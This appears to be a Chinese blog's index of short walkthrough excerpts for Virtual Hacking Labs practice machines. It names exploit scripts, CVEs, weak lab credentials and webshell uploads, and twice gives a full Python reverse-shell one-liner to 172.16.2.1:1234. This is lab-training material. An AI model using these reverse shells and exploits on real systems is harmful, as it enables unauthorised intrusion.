
VHL
菜浪马废
!
展开
-
virtualhackinglabs靶机 Jennifer 10.12.2.146
wampp: xampp密码好像没啥用啊访问xammp和phpmyadmin都不需要密码原创 2020-11-30 17:57:10 · 920 阅读 · 0 评论 -
virtualhackinglabs靶机 Web01-Prd 10.12.1.7
39891.txt原创 2020-11-29 18:43:35 · 1216 阅读 · 0 评论 -
virtualhackinglabs靶机 HELPDESK 10.12.1.11
有一个目录scphelpdesk:helpdesk1234321原创 2020-11-22 17:29:00 · 982 阅读 · 0 评论 -
virtualhackinglabs靶机 NCM01 10.12.1.164
原创 2020-11-12 16:58:21 · 559 阅读 · 0 评论 -
virtualhackinglabs靶机 Mon01 10.12.2.241
https://github.com/ruthvikvegunta/nagiosxi_rce-to-root/blob/master/nagiosxi.py原创 2020-11-11 13:56:46 · 510 阅读 · 0 评论 -
virtualhackinglabs靶机 websrv01 10.12.2.243
https://github.com/g0rx/Drupal-SA-CORE-2019-003/blob/master/cve-2019-6340.pysettings.php files found: .原创 2020-11-10 19:38:47 · 618 阅读 · 0 评论 -
virtualhackinglabs靶机 Mon02 10.12.2.244
原创 2020-11-09 23:58:03 · 1343 阅读 · 0 评论 -
virtualhackinglabs靶机 GRAPHS01 10.12.2.245
漏洞就在脸上了https://github.com/mhaskar/CVE-2020-8813为啥用不了呢原创 2020-11-09 21:29:20 · 755 阅读 · 0 评论 -
virtualhackinglabs靶机 CMS02 10.12.1.35
原创 2020-11-08 19:09:03 · 673 阅读 · 0 评论 -
virtualhackinglabs靶机 Webadmin 10.12.1.88
原创 2020-11-02 17:33:40 · 585 阅读 · 0 评论 -
virtualhackinglabs靶机 TRAILS 10.12.1.41
原创 2020-11-01 16:22:14 · 597 阅读 · 0 评论 -
virtualhackinglabs靶机 FED 10.12.1.68
原创 2020-11-01 00:13:38 · 824 阅读 · 0 评论 -
virtualhackinglabs靶机 WINAS01 10.12.1.136
https://github.com/ruthvikvegunta/XAMPP-WebDAV-Exploit/blob/master/webdav_exploit.pyhttps://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe原创 2020-10-31 15:21:13 · 927 阅读 · 0 评论 -
virtualhackinglabs靶机 Sam 10.12.1.129
smb 3.5.11漏洞直接root原创 2020-10-31 02:06:28 · 602 阅读 · 0 评论 -
virtualhackinglabs靶机 JAMES 10.12.1.95
修改一下脚本原创 2020-10-29 22:16:39 · 985 阅读 · 0 评论 -
virtualhackinglabs靶机 CMS01 10.12.1.177
#!/usr/bin/pythonfrom __future__ import print_functionimport requestsimport sysimport reimport argparseimport base64import osimport randomimport timetry: # Python 2.6-2.7 from HTMLParser import HTMLParserexcept ImportError: # Python 3 ...原创 2020-10-24 20:08:47 · 1344 阅读 · 0 评论 -
virtualhackinglabs靶机 BREEZE 10.12.1.124
#!/usr/bin/pythonprint "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"#Author website: www.tulpa-security.com#Author twitter: @tulpa_security#Exploit will land you NT AUTHORITY\SYSTE...原创 2020-10-24 14:46:05 · 797 阅读 · 0 评论 -
virtualhackinglabs靶机 John 10.12.1.83
第一种:ms17-010第二种:ms08-067cve2019-0708好像也可以利用懒得写了原创 2020-10-22 15:24:45 · 321 阅读 · 0 评论 -
virtualhackinglabs靶机 AS45 10.12.1.109
有远程命令执行漏洞原创 2020-10-22 14:48:22 · 663 阅读 · 0 评论 -
virtualhackinglabs靶机 MANTIS 10.12.1.74
看一看密码重置的漏洞得到了webshell晚上再写吧下午上课原创 2020-10-21 13:17:49 · 644 阅读 · 0 评论 -
virtualhackinglabs靶机 android 10.12.1.48
完成原创 2020-10-20 22:43:45 · 398 阅读 · 0 评论 -
virtualhackinglabs靶机 STEVEN 10.12.1.36
弱密码admin:admin有命令执行漏洞不用msf的话原创 2020-10-20 20:57:55 · 423 阅读 · 0 评论 -
virtualhackinglabs靶机 ANTHONY 10.12.1.113
两种方法第一种方法(ms17-010)得到了NAS的凭证第二中方法原创 2020-10-19 22:09:05 · 552 阅读 · 0 评论 -
virtualhackinglabs靶机 NAS 10.12.1.121
字符串是密钥原创 2020-10-19 21:50:11 · 882 阅读 · 0 评论 -
virtualhackinglabs靶机 PBX01 10.12.1.117
弱密码admin:adminpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'拿w..原创 2020-10-19 11:39:22 · 572 阅读 · 0 评论 -
virtualhackinglabs靶机 REACT 10.12.1.188
找到了文件算了算了写不动了今天写了6台了吧实在写不动了明天再说原创 2020-10-18 21:31:18 · 482 阅读 · 0 评论 -
virtualhackinglabs靶机 FW01 10.12.1.200
需要密码admin:admin弱密码猜解成功有漏洞脚本地址验证成功得到webshell直接切换用户root:root弱密码得到权限原创 2020-10-18 20:17:18 · 519 阅读 · 0 评论 -
virtualhackinglabs靶机 RTR-VHL-01 10.12.2.240
搜一下版本漏洞漏洞脚本地址应该算做完了吧官网的最后一个提示是在FTP中查看key.txt文件就算做完了吧这台机器好没意思原创 2020-10-18 19:42:37 · 484 阅读 · 0 评论 -
virtualhackinglabs靶机 PBX 10.12.1.17
wordpress用wpscan扫描一下原创 2020-10-18 16:44:47 · 1042 阅读 · 0 评论 -
virtualhackinglabs靶机 NATURAL 10.12.1.77
80端口找到文件上传上传.php文件需要抓包修改一下参数就可以绕过了得到webshell/binbackdoor很可疑下载到本地分析看了半天还是不会提权原创 2020-10-18 15:47:29 · 869 阅读 · 0 评论 -
virtualhackinglabs靶机 Core 10.12.1.160
tomcat:s3cret直接登录进来了接下来上传文件拿到webshell现在考虑提权的问题linpeas.sh跑了一下发现/usr/lib/pt_chown —> GNU_glibc_2.1/2.1.1_-6(08-1999)利用失败利用失败原创 2020-10-18 14:19:23 · 650 阅读 · 0 评论 -
virtualhackinglabs靶机 DOLPHIN 10.12.1.58
VHL提示了是dolphin的RCE40756.py完成之前卡在web-dev卡了好久下把那个往后放一放先刷别的靶机原创 2020-10-17 19:57:01 · 917 阅读 · 0 评论 -
virtualhackinglabs靶机 VPS1723 10.12.1.53
ftp有远程命令执行漏洞脚本python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.2.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'执行命令..原创 2020-10-17 16:58:31 · 822 阅读 · 0 评论 -
virtualhackinglabs靶机 Web01-Dev 10.12.1.6
先看80发现一个登录页面,一个cms,一个phpmyadmin没找到利用明天再写原创 2020-10-11 22:34:44 · 1204 阅读 · 0 评论 -
virtualhackinglabs靶机 Backupadmin 10.12.1.4
先看ftp里面有个文件没啥用好像看一下80可以利用/uploads页面访问需要密码是不是要通过LFI读取文件获得密码然后上传脚本getshell呢明白了明白了FTP里的文件相当于是给了你/etc下的文件目录查看里面的文件找到一个账号backupuser:apr1apr1apr1hk8Ikz6P$S260ZcSXHNUCoc2Afh7mp.backupuser:0811783909密码有了但是应该不是用来webshell的没错是ssh的直接登录提权.原创 2020-10-11 17:35:12 · 1054 阅读 · 0 评论 -
virtualhackinglabs靶机 Techblog 10.12.1.3
访问了一下主页发现是wordpress用wpscan跑一下得到一个用户名techblog一个插件wordfence倒是有漏洞但是没办法利用wordpress版本也没有可利用漏洞WordPress Site Import 1.0.1在blog里找到这个验证一下还真是LFItechblog:z8n#DZf@Sa#X!4@tqG得到账号登录成功修改文件404.php改成脚本然后随便访问一个不存在的页面还是先考虑内核提权没找到利用啊明天再说...原创 2020-10-10 22:14:47 · 1551 阅读 · 0 评论 -
virtualhackinglabs靶机 Lucky 10.12.1.2
80端口扫了一下目录/data 有许多数据/admin 登录页面MD5解密lucky:luckyssh登录失败试一下cms登录成功了找到了cms版本号文件上传漏洞为啥我不能上传文件呢明天再看看吧原创 2020-10-10 18:41:15 · 974 阅读 · 0 评论